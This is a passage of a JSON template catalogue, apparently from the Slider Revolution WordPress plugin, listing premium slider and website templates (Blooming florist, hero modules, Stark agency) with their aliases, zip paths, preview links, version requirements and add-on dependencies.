Text\",\"alias\":\"blooming-wedding-text\",\"zip\":\"packs\\/blooming-wedding-text.zip\",\"uid\":\"326f2793294a739dd3aac3cc45332df8\",\"img\":\"blooming-wedding-text\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/event-florist-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=event-florist-template\",\"version\":\"1.0.0\",\"required\":\"6.1.5\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Blooming Event Florist Template is a complete one-page website solution with beautiful floral animations.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Blooming Event Florist Template\",\"package_order\":\"6\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"36\",\"installed\":false},\"410\":{\"id\":\"455\",\"title\":\"Blooming Parties Title\",\"alias\":\"blooming-parties-title\",\"zip\":\"packs\\/blooming-parties-title.zip\",\"uid\":\"b47aae1b368d3c3d9017f260e6c6a547\",\"img\":\"blooming-parties-title\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/event-florist-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=event-florist-template\",\"version\":\"1.0.0\",\"required\":\"6.1.5\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Blooming Event Florist Template is a complete one-page website solution with beautiful floral animations.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Blooming Event Florist Template\",\"package_order\":\"7\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"36\",\"installed\":false},\"411\":{\"id\":\"456\",\"title\":\"Blooming Parties Carousel\",\"alias\":\"blooming-parties-carousel\",\"zip\":\"packs\\/blooming-parties-carousel.zip\",\"uid\":\"9f90a9da7b017aeee7f3b608cda066e6\",\"img\":\"blooming-parties-carousel\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/event-florist-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=event-florist-template\",\"version\":\"1.0.0\",\"required\":\"6.1.5\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Blooming Event Florist Template is a complete one-page website solution with beautiful floral animations.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"carousel\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Blooming Event Florist Template\",\"package_order\":\"8\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"36\",\"installed\":false},\"412\":{\"id\":\"457\",\"title\":\"Blooming Parties Text\",\"alias\":\"blooming-parties-text\",\"zip\":\"packs\\/blooming-parties-text.zip\",\"uid\":\"66a47346cc639b8b9b9b5dfa1521b6ef\",\"img\":\"blooming-parties-text\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/event-florist-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=event-florist-template\",\"version\":\"1.0.0\",\"required\":\"6.1.5\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Blooming Event Florist Template is a complete one-page website solution with beautiful floral animations.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Blooming Event Florist Template\",\"package_order\":\"9\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"36\",\"installed\":false},\"413\":{\"id\":\"458\",\"title\":\"Blooming Funeral Title\",\"alias\":\"blooming-funeral-title\",\"zip\":\"packs\\/blooming-funeral-title.zip\",\"uid\":\"e9e77134472c33c56be442073f29d1fd\",\"img\":\"blooming-funeral-title\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/event-florist-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=event-florist-template\",\"version\":\"1.0.0\",\"required\":\"6.1.5\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Blooming Event Florist Template is a complete one-page website solution with beautiful floral animations.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Blooming Event Florist Template\",\"package_order\":\"10\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"36\",\"installed\":false},\"414\":{\"id\":\"459\",\"title\":\"Blooming Funeral Slider\",\"alias\":\"blooming-funeral-slider\",\"zip\":\"packs\\/blooming-funeral-slider.zip\",\"uid\":\"d15090841c25c7c8f0e1b0987c0c0887\",\"img\":\"blooming-funeral-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/event-florist-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=event-florist-template\",\"version\":\"1.0.0\",\"required\":\"6.1.5\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Blooming Event Florist Template is a complete one-page website solution with beautiful floral animations.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"carousel\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Blooming Event Florist Template\",\"package_order\":\"11\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"36\",\"installed\":false},\"415\":{\"id\":\"460\",\"title\":\"Blooming Funeral Text\",\"alias\":\"blooming-funeral-text\",\"zip\":\"packs\\/blooming-funeral-text.zip\",\"uid\":\"d7c80e246f31e3d2f4e5dc1656f133cc\",\"img\":\"blooming-funeral-text\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/event-florist-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=event-florist-template\",\"version\":\"1.0.0\",\"required\":\"6.1.5\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Blooming Event Florist Template is a complete one-page website solution with beautiful floral animations.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Blooming Event Florist Template\",\"package_order\":\"12\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"36\",\"installed\":false},\"416\":{\"id\":\"461\",\"title\":\"Blooming Contact\",\"alias\":\"blooming-contact\",\"zip\":\"packs\\/blooming-contact.zip\",\"uid\":\"54280182bca86443e2648b3146f41e47\",\"img\":\"blooming-contact\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/event-florist-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=event-florist-template\",\"version\":\"1.0.0\",\"required\":\"6.1.5\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Blooming Event Florist Template is a complete one-page website solution with beautiful floral animations.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Blooming Event Florist Template\",\"package_order\":\"13\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"36\",\"installed\":false},\"417\":{\"id\":\"462\",\"title\":\"Particle Hero\",\"alias\":\"particle-hero\",\"zip\":\"particle-hero.zip\",\"uid\":\"3f422f4807bf9ef4cb15dade515dad00\",\"img\":\"particle-hero\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wordpress-hero-image-header\\/#slide6?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=#slide6\",\"version\":\"1.0.0\",\"required\":\"6.1.5\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A Hero header module using the Particle Effect Add-On.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particles-addon\\\\\\/revslider-particles-addon.php\\\",\\\"name\\\":\\\"Particles Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"418\":{\"id\":\"463\",\"title\":\"Bubble Morph Hero\",\"alias\":\"bubble-morph-hero\",\"zip\":\"bubble-morph-hero.zip\",\"uid\":\"b47e6bcc1ae80393ff3f7388ed3b9f8f\",\"img\":\"bubble-morph-hero\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wordpress-hero-image-header\\/#slide5?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=#slide5\",\"version\":\"1.0.0\",\"required\":\"6.1.5\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A Hero header module using the Bubble Morph Add-On.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-bubblemorph-addon\\\\\\/revslider-bubblemorph-addon.php\\\",\\\"name\\\":\\\"BubbleMorph AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"419\":{\"id\":\"464\",\"title\":\"Parallax Hero\",\"alias\":\"parallax-hero\",\"zip\":\"parallax-hero.zip\",\"uid\":\"290e86534326ee118e96ae7ce0538fa2\",\"img\":\"parallax-hero\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wordpress-hero-image-header\\/#slide4?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=#slide4\",\"version\":\"1.0.0\",\"required\":\"6.1.5\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A parallax hero module with mouse move interaction.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"420\":{\"id\":\"465\",\"title\":\"Video Hero\",\"alias\":\"video-hero\",\"zip\":\"video-hero.zip\",\"uid\":\"f9e280015d3408bb0482e13fe753da8f\",\"img\":\"video-hero\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wordpress-hero-image-header\\/#slide3?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=#slide3\",\"version\":\"1.0.0\",\"required\":\"6.1.5\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A simple Hero header module with HTML5 video.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"421\":{\"id\":\"466\",\"title\":\"Ken Burns Hero\",\"alias\":\"ken-burns-hero\",\"zip\":\"ken-burns-hero.zip\",\"uid\":\"d5f89e5f5b3991b995e2bfeb50cfe9f8\",\"img\":\"ken-burns-hero\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wordpress-hero-image-header\\/#slide2?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=#slide2\",\"version\":\"1.0.0\",\"required\":\"6.1.5\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A simple image background hero header module with a subtle Ken Burns effect.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"422\":{\"id\":\"467\",\"title\":\"Basic Hero Collection\",\"alias\":\"basic-hero-collection\",\"zip\":\"basic-hero-collection.zip\",\"uid\":\"ff625c65e8aab4689fa56d5652279d51\",\"img\":\"basic-hero-collection\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wordpress-hero-image-header\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-hero-image-header\",\"version\":\"1.0.0\",\"required\":\"6.1.5\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A collection of WordPress Hero Headers with image, video, particles, parallax and more!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particles-addon\\\\\\/revslider-particles-addon.php\\\",\\\"name\\\":\\\"Particles Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-bubblemorph-addon\\\\\\/revslider-bubblemorph-addon.php\\\",\\\"name\\\":\\\"BubbleMorph AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"423\":{\"id\":\"468\",\"title\":\"Launching Very Soon\",\"alias\":\"launching-very-soon\",\"zip\":\"launching-very-soon.zip\",\"uid\":\"2da45cf2d9bec07e7183b3f7777986b9\",\"img\":\"launching-very-soon\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/launching-soon-countdown\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=launching-soon-countdown\",\"version\":\"1.0.0\",\"required\":\"6.1.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">Rocket BOOST! A beautifully animated launching soon countdown module using our \\\"Coming Soon\\\" Add-On.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-maintenance-addon\\\\\\/revslider-maintenance-addon.php\\\",\\\"name\\\":\\\"Coming Soon & Maintenance AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/revslider-doc\\\\\\/add-coming-soon-maintenance\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"424\":{\"id\":\"469\",\"title\":\"Under Construction\",\"alias\":\"Under-Construction\",\"zip\":\"Under-Construction.zip\",\"uid\":\"4b12f9a82a5b48d45a707df93406eb5b\",\"img\":\"Under-Construction\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/under-construction\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=under-construction\",\"version\":\"1.0.0\",\"required\":\"6.1.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">You will love this animated under construction landing page using our \\\"Coming Soon\\\" Add-On.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-maintenance-addon\\\\\\/revslider-maintenance-addon.php\\\",\\\"name\\\":\\\"Coming Soon & Maintenance AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/revslider-doc\\\\\\/add-coming-soon-maintenance\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"Create an Under Construction Page That\\u2019ll Entertain Visitors While You Work [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/create-an-under-construction-page-that-will-entertain-visitors-while-you-work\\/\",\"guide_img\":\"tutorial\\/Under-Construction.jpg\",\"active\":\"1\",\"installed\":false},\"425\":{\"id\":\"470\",\"title\":\"Particle Effect\",\"alias\":\"Particle-Effect\",\"zip\":\"Particle-Effect.zip\",\"uid\":\"66cf4e514e83a6984903694fd587edb6\",\"img\":\"Particle-Effect\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/snow-particle-scene\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=snow-particle-scene\",\"version\":\"1.0.0\",\"required\":\"6.1.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">Get into a winter mood with our Snow Particle Scene for Slider Revolution!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particles-addon\\\\\\/revslider-particles-addon.php\\\",\\\"name\\\":\\\"Particles Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"426\":{\"id\":\"471\",\"title\":\"Particle Effect 2\",\"alias\":\"Particle-Effect-2\",\"zip\":\"Particle-Effect-2.zip\",\"uid\":\"303337c29a97a816ccecca7e5f0b5e20\",\"img\":\"Particle-Effect-2\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/cyber-particle-effect\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=cyber-particle-effect\",\"version\":\"1.0.0\",\"required\":\"6.1.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">Amaze your website visitors with the cyber particle effect for Slider Revolution!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particles-addon\\\\\\/revslider-particles-addon.php\\\",\\\"name\\\":\\\"Particles Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Retro-Inspired Design for the Hero Section [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-retro-inspired-design-for-the-hero-section\\/\",\"guide_img\":\"tutorial\\/Particle-Effect-2.png\",\"active\":\"1\",\"installed\":false},\"427\":{\"id\":\"472\",\"title\":\"Stark Website Template\",\"alias\":\"stark-website-template\",\"zip\":\"\",\"uid\":\"stark-website-template-package\",\"img\":\"packages\\/stark-website-template-package.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/stark-agency-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=stark-agency-website-template\",\"version\":\"1.0.0\",\"required\":\"6.1.6\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">The Stark Agency website template is a collection of modules using our new Gutenberg Block \\\"margin & padding\\\" feature. Create unique, customizable layouts!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Stark Website Template\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"37\",\"installed\":false},\"428\":{\"id\":\"473\",\"title\":\"Stark Menu\",\"alias\":\"stark-menu\",\"zip\":\"packs\\/stark-menu.zip\",\"uid\":\"bb31150df180e784d76a1f5ea306bf05\",\"img\":\"stark-menu\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/stark-agency-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=stark-agency-website-template\",\"version\":\"1.0.0\",\"required\":\"6.1.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Stark Agency website template is a collection of modules using our new Gutenberg Block \\\"margin & padding\\\" feature. Create unique, customizable layouts!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Stark Website Template\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"offset=\\\"t:0px,0px,0px,0px;b:0px,0px,0px,0px;l:140px,70px,0px,0px;r:140px,70px,0px,0px;\\\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"37\",\"installed\":false},\"429\":{\"id\":\"474\",\"title\":\"Stark Header\",\"alias\":\"stark-header\",\"zip\":\"packs\\/stark-header.zip\",\"uid\":\"62bfca01bf6e33cfad81d8df06498299\",\"img\":\"stark-header\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/stark-agency-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=stark-agency-website-template\",\"version\":\"1.0.0\",\"required\":\"6.1.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Stark Agency website template is a collection of modules using our new Gutenberg Block \\\"margin & padding\\\" feature. Create unique, customizable layouts!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Stark Website Template\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"offset=\\\"t:40px,30px,20px,10px;b:0px,0px,0px,0px;l:40px,30px,20px,10px;r:40px,30px,20px,10px;\\\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"37\",\"installed\":false},\"430\":{\"id\":\"475\",\"title\":\"Stark Content\",\"alias\":\"stark-content\",\"zip\":\"packs\\/stark-content.zip\",\"uid\":\"4577ca760133eb5d894c46f212f6eefb\",\"img\":\"stark-content\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/stark-agency-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=stark-agency-website-template\",\"version\":\"1.0.2\",\"required\":\"6.2.22\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Stark Agency website template is a collection of modules using our new Gutenberg Block \\\"margin & padding\\\" feature. Create unique, customizable layouts!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Stark Website Template\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"offset=\\\"t:-50px,-30px,-30px,-20px;b:0px,0px,0px,0px;l:140px,70px,50px,30px;r:140px,70px,50px,30px;\\\" zindex=\\\"6\\\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"37\",\"installed\":false},\"431\":{\"id\":\"476\",\"title\":\"Stark Carousel\",\"alias\":\"stark-carousel\",\"zip\":\"packs\\/stark-carousel.zip\",\"uid\":\"de63336d333eeff10eccfd5d9741e6c9\",\"img\":\"stark-carousel\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/stark-agency-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=stark-agency-website-template\",\"version\":\"1.0.0\",\"required\":\"6.1.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Stark Agency website template is a collection of modules using our new Gutenberg Block \\\"margin & padding\\\" feature. Create unique, customizable layouts!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Stark Website Template\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"offset=\\\"t:-50px,-30px,-30px,-20px;b:0px,0px,0px,0px;l:40px,30px,20px,10px;r:40px,30px,20px,10px;\\\" zindex=\\\"1\\\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"37\",\"installed\":false},\"432\":{\"id\":\"477\",\"title\":\"Stark Portfolio\",\"alias\":\"stark-portfolio\",\"zip\":\"packs\\/stark-portfolio.zip\",\"uid\":\"99fcf3df65f8471fe30bec1bf0c2350d\",\"img\":\"stark-portfolio\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/stark-agency-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=stark-agency-website-template\",\"version\":\"1.0.2\",\"required\":\"6.2.22\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Stark Agency website template is a collection of modules using our new Gutenberg Block \\\"margin & padding\\\" feature. Create unique, customizable layouts!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Stark Website Template\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"offset=\\\"t:-50px,-30px,-30px,-20px;b:0px,0px,0px,0px;l:140px,70px,50px,30px;r:140px,70px,50px,30px;\\\" zindex=\\\"5\\\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"37\",\"installed\":false},\"433\":{\"id\":\"478\",\"title\":\"Stark Portfolio Detail\",\"alias\":\"stark-portfolio-detail\",\"zip\":\"packs\\/stark-portfolio-detail.zip\",\"uid\":\"7484fc54f81daec07c93e992216310ce\",\"img\":\"stark-portfolio-detail\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/stark-agency-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=stark-agency-website-template\",\"version\":\"1.0.0\",\"required\":\"6.1.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Stark Agency website template is a collection of modules using our new Gutenberg Block \\\"margin & padding\\\" feature. Create unique, customizable layouts!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 